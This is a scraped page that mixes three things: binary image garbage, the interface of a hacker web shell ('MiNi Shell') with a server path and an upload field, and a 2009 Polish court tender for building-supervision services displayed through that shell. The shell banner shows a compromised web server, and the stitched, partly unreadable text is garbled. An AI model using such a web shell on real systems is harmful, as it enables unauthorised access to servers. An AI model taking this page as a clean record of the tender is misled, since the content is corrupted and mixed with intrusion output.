JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090127/10068-N-2009.html

<p class="kh_header"><b>Lublin: Nadzór inwestorski nad budową budynku Sądu Rejonowego i Prokuratury Rejonowej w Radzyniu Podlaskim.</b><br>
<b>Numer ogłoszenia: 10068 - 2009; data zamieszczenia: 27.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Okręgowy w Lublinie , ul. Krakowskie Przedmieście 43, 20-076 Lublin, woj. lubelskie, tel. 081 5359164, faks 081 5359164.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.so.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: wymiar sprawiedliwości.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nadzór inwestorski nad budową budynku Sądu Rejonowego i Prokuratury Rejonowej w Radzyniu Podlaskim..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest nadzór inwestorski zadania pod nazwą: Budowa budynku Sądu Rejonowego i Prokuratury Rejonowej w Radzyniu Podlaskim przy ul. Kardynała Stefana Wyszyńskiego.
W ramach realizacji przedmiotu zamówienia, Wykonawca pełnić będzie obowiązki i funkcje Inspektora Nadzoru Inwestorskiego, zgodnie z ustawą z dnia 7 lipca 1994 r Prawo budowlane (tekst jedn. Dz. U. z 2006 r., Nr 156, poz.1118 z późn. zm.), w następujących specjalnościach:
1. konstrukcyjno-budowlanej,
2.  instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
3. instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych,
4. drogowej
Nadzór inwestorski realizowany będzie dla zadania pod nazwą:  Budowa budynku Sądu Rejonowego i Prokuratury Rejonowej w Radzyniu Podlaskim przy ul. Kardynała Stefana Wyszyńskiego, obejmującego roboty budowlane w zakresie określonym w dokumentacji projektowej, w skład, której wchodzą:
Część I  TOM 1,5  Projekt Wykonawczy Architektoniczny i Projekt Wnętrz 
Część I  TOM 2,5  Projekt Wykonawczy Architektoniczny i Projekt Wnętrz 
Część I  TOM 3,5  Projekt Wykonawczy Architektoniczny i Projekt Wnętrz 
Część I  TOM 4,5  Projekt Wykonawczy Architektoniczny i Projekt Wnętrz 
Część I  TOM 5,5  Projekt Wykonawczy Architektoniczny i Projekt Wnętrz 
Część II  TOM 1,2  Projekt Wykonawczy Konstrukcja 
Część II  TOM 2,2  Projekt Wykonawczy Konstrukcja 
Część III  TOM 1,3  Projekt Wykonawczy Instalacje Sanitarne
Część III  TOM 2,3  Projekt Wykonawczy Instalacje Sanitarne
Część III  TOM 3,3  Projekt Wykonawczy Instalacje Sanitarne
Część IV  TOM 1,2 Projekt Wykonawczy Instalacje Elektryczne
Część IV  TOM 2,2 Projekt Wykonawczy Instalacje Elektryczne
Część V  Projekt Wykonawczy Drogi
Część VI  Projekt Wykonawczy Zieleń
Inwentaryzacja dendrologiczna
Dokumentacja geologiczna 
Informacja BIOZ
Specyfikacje techniczne:
Część I, II -  Architektura, konstrukcja
Część III - Instalacje sanitarne i wentylacji mechanicznej 
Część IV - Instalacje elektryczne 
Część V - Drogi
Przedmiary robót (funkcja pomocnicza)

oraz wykonania i montażu w realizowanym budynku regałów przesuwnych, zgodnie z Projektem Wykonawczym Architektonicznym i Projektem Wnętrz.

Wykonawca przed złożeniem oferty powinien się zapoznać z ww. dokumentacją dostępną w Sądzie Okręgowym w Lublinie przy ul. Krakowskie Przedmieście 43, pokój 226 w godzinach od 9do 14 lub na stronie internetowej Zamawiającego: www.so.lublin.pl

1) W ramach pełnienia funkcji Inspektora Nadzoru Inwestorskiego, do podstawowych obowiązków Wykonawcy należy w szczególności:

        
1)	prowadzenie nadzoru nad wykonywaniem robót i ich finansowaniem zgodnie
z harmonogramem tych robót;
2)	uczestniczenie w naradach technicznych, problemowych i innych organizowanych przez wszystkie strony procesu inwestycyjnego oraz ich protokołowanie;
3)	wydawanie zgody na wykonanie ewentualnych robót dodatkowych po uprzednim uzgodnieniu tej kwestii z Zamawiającym;
4)	podejmowanie wszelkich działań umożliwiających prawidłową realizację harmonogramu robót;
5)	pełnienie funkcji koordynacyjnych na budowie;
6)	stałe konsultowanie i fachowe doradztwo na rzecz Inwestora (Zamawiającego);
7)	kontrola dokumentacji wykonawcy robót budowlanych, w tym sprawdzanie obmiarów wykonanych robót (książki obmiarów) i protokołów;
8)	kontrola rozliczeń finansowych budowy (ewidencja i bilansowanie dokumentów rozliczeniowych - faktur i rachunków);
9)	szeroko rozumiana współpraca z Inwestorem (Zamawiającym), jednostką projektową i wykonawczą robót budowlanych w zakresie realizowanych robót budowlanych;
10)	podejmowanie wszelkich niezbędnych działań w celu ochrony interesów Inwestora (Zamawiającego);
11)	uczestnictwo w procesie uzyskania pozwolenia na użytkowanie obiektu;

Sprawowanie nadzoru nad prowadzonymi robotami budowlanymi zgodnie z art. 25, 26 i 27 Prawa budowlanego oraz zasadami działania inspektora nadzoru, to jest w szczególności:
1)	kontrola jakości wykonanych prac budowlanych, zgodności robót z projektem i pozwoleniem na budowę, obowiązującymi przepisami i normami, przepisami techniczno - budowlanymi oraz przepisami bhp, SANEPID, p.poż.; 
2)	sprawdzenie posiadania przez wykonawcę odpowiednich dokumentów (atestów, certyfikatów, świadectw jakości, wyników badań, itp.) dotyczących materiałów i urządzeń stosowanych przez wykonawcę robót budowlanych;
3)	kontrola prawidłowości prowadzenia dziennika budowy, książek obmiarów i dokonywania w nim wpisów; 
4)	sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających;
5)	uczestniczenie w prowadzonych próbach i odbiorach technicznych instalacji, urządzeń technicznych i przewodów kominowych oraz przygotowywanie i udział w czynnościach
6)	odbioru gotowych obiektów budowlanych i przekazywanie ich do użytkowania;
7)	rozstrzyganie wątpliwości o charakterze technicznym powstałych w toku prowadzenia robót, a w razie potrzeby zasięganie opinii autora projektu lub rzeczoznawców;
8)	bieżące prowadzenie rozliczeń finansowych z wykonawcą, podwykonawcami, dostawcami usług i towarów oraz sprawdzanie kalkulacji wycen i faktur;
9)	opracowanie końcowego rozliczenia robót budowlanych;
10)	bieżące informowanie Inwestora o postępie robót na budowie i ewentualnych trudnościach w ich realizacji;
11)	zorganizowanie i dokonanie przy udziale Inwestora odbioru końcowego robót budowlanych oraz protokolarne przekazanie Inwestorowi zrealizowanego zadania inwestycyjnego;
12)	sporządzenie wniosków o zapłatę kar umownych przez wykonawcę za nieterminowe wykonanie przedmiotu umowy;
13)	wystawienia dowodów PT w terminie 30 dni od daty końcowego odbioru oraz przedłożenie Inwestorowi oświadczenia o usunięciu przez wykonawcę ewentualnych wad stwierdzonych przy odbiorze.

Przewidywany w umowie z Wykonawcą czas trwania robót budowlanych wynosi 30 miesięcy od podpisania umowy, co nastąpiło w dniu 20.11.2008 r., natomiast czas trwania odbioru robót - 30 dni.


2) Celem prawidłowego wykonania obowiązków, o których mowa w pkt. 1 , Inspektor Nadzoru Inwestorskiego powinien:
a. kontrolować roboty budowlane, co najmniej 2 razy w tygodniu i sporządzać dokumentację fotograficzną z postępu procesu budowlanego,
b. wydawać kierownikowi budowy lub kierownikowi robót polecenia, potwierdzone wpisem do dziennika budowy, dotyczące: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych, oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych i dowodów dopuszczenia do stosowania w budownictwie wyrobów budowlanych oraz urządzeń technicznych;
c. żądać od kierownika budowy lub kierownika robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót, a także wstrzymania dal?szych robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Wadium należy wnieść w wysokości : 
7000 zł. ( słownie: siedem tysięcy zł.)
przed upływem terminu składania ofert 
2.	Zamawiający żąda dowodu wniesienia wadium ( np. kopii przelewu; w postaci  kopii gwarancji zapłaty wadium) dołączonego do oferty. Jeżeli wadium ma formę gwarancji lub poręczenia, Zamawiający zaleca jego składanie w oryginale. Zamawiający wymaga złożenia oryginału gwarancji lub oryginału poręczenia w zakresie wniesienia wadium w przypadku, gdy pozostawienie oryginału w posiadaniu Wykonawcy może uniemożliwiać Zamawiającemu dochodzenie roszczeń przysługujących z gwarancji- poręczenia oraz jeżeli stwarza to zagrożenie wygaśnięcia- odwołania ustanowionego w ten sposób zabezpieczenia interesu Zamawiającego. W innym przypadku wystarczająca jest kopia dokumentu poświadczona (potwierdzona) za zgodność z oryginałem przez osobę-osoby uprawnioną-uprawnione do reprezentowania wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu może wziąć udział wykonawca który:
-posiada uprawnienia do wykonania działalności z zakresu przedmiotu zamówienia. 

-posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawia pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,

-znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,

-nie podlega wykluczeniu z postępowania o udzielenie zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Każdy z wykonawców ma obowiązek złożyć następujące dokumenty potwierdzające spełnienie warunków udziału w postępowaniu:
1)	Oświadczenie wykonawcy, o spełnianiu warunków określonych w art. 22 ustawy, według wzoru, stanowiącego załącznik  do  siwz.

W przypadku składania oferty wspólnej ww. oświadczenie składa każdy z wykonawców składających ofertę wspólną.
2)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej (jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności), wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
W przypadku składania oferty wspólnej ww. dokument składa każdy z wykonawców składających ofertę wspólną.
      3)  Wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia 
           postępowania, złożony według wzoru stanowiącego załącznik nr 3 do niniejszej siwz 
	
Zamawiający uzna, że wykonawca posiada niezbędną wiedzę i doświadczenie, jeżeli wykaże się on wykonaniem, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeśli okres działalności jest krótszy - w tym okresie, co najmniej jednego nadzoru inwestorskiego budowy* budynku użyteczności publicznej** o wielkości: powierzchnia netto - co najmniej 3500 m2 oraz kubatura brutto - co najmniej 15000 m3. Wykonawca musi udokumentować jego należyte wykonanie (np. referencje). Nadzór inwestorski spełniający w/w kryteria zostanie uznany przez Zamawiającego za nadzór odpowiadający rodzajem i wartością nadzorowi stanowiącemu przedmiot zamówienia.
	
* budowa należy przez to rozumieć wykonywanie obiektu budowlanego w określonym miejscu, a także odbudowę, rozbudowę, nadbudowę obiektu budowlanego (art. 3 pkt 6 ustawy z dnia 7 lipca 1994 r. Prawo budowlane - tekst jedn. Dz. U. z 2006 r., Nr 156, poz. 1118 z późn. zm.)
** budynek użyteczności publicznej należy przez to rozumieć budynek przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, opieki zdrowotnej, opieki społecznej i socjalnej, obsługi bankowej, handlu, gastronomii, usług, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym, świadczenia usług pocztowych lub telekomunikacyjnych oraz inny ogólnodostępny budynek przeznaczony do wykonywania podobnych funkcji, w tym także budynek biurowy i socjalny (§ 3 pkt 6 rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie - Dz. U. z 2002 r. Nr 75, poz. 690 z późn. zm.) 
 
W przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają jeden wspólny ww. wykaz. Warunek zostanie uznany przez zamawiającego za spełniony, jeżeli wykonawcy składający ofertę wspólną wykażą, że w/w  warunek spełniają łącznie.

4)	Wykaz osób i podmiotów, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z danymi na temat ich kwalifikacji zawodowych ,doświadczenia i wykształcenia niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nie czynności . 
Warunkiem udziału w postępowaniu jest dysponowanie przez Wykonawcę osobami legitymującymi się doświadczeniem i kwalifikacjami odpowiednimi do stanowisk, jakie zostaną im powierzone. Wykonawca przedstawi w ofercie kandydata/kandydatów na każde n/w stanowisko: 
1.	Inspektora nadzoru inwestorskiego z uprawnieniami budowlanymi bez ograniczeń 
w specjalności konstrukcyjno-budowlanej,
2.	Inspektora nadzoru inwestorskiego z uprawnieniami budowlanymi bez ograniczeń 
w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych; 
3.	Inspektora nadzoru inwestorskiego z uprawnieniami budowlanymi bez ograniczeń 
w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych;
4.	Inspektora nadzoru inwestorskiego z uprawnieniami budowlanymi bez ograniczeń w specjalności drogowej;
Wszyscy inspektorzy nadzoru wymienieni w ofercie winny posiadać odpowiednie uprawnienia budowlane do kierowania robotami budowlanymi, zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2006 r., Nr 156, poz.1118 z późn. zm.)  oraz z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2006 r., Nr 83, poz. 578), a także aktualne zaświadczenie o wpisie na listę członków właściwej Izby Samorządu Zawodowego.
Kopie w/w dokumentów należy dołączyć do oferty.


5) Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w ppkt 4), wykonawca wskazał osoby, którymi będzie dysponował..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.so.lublin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Okręgowy w Lublinie ul. Krakowskie Przedmieście 43 pokój nr 209..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2009 godzina 11:00, miejsce: Sąd Okręgowy w Lublinie ul. Krakowskie Przedmieście 43 pokój nr 209..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com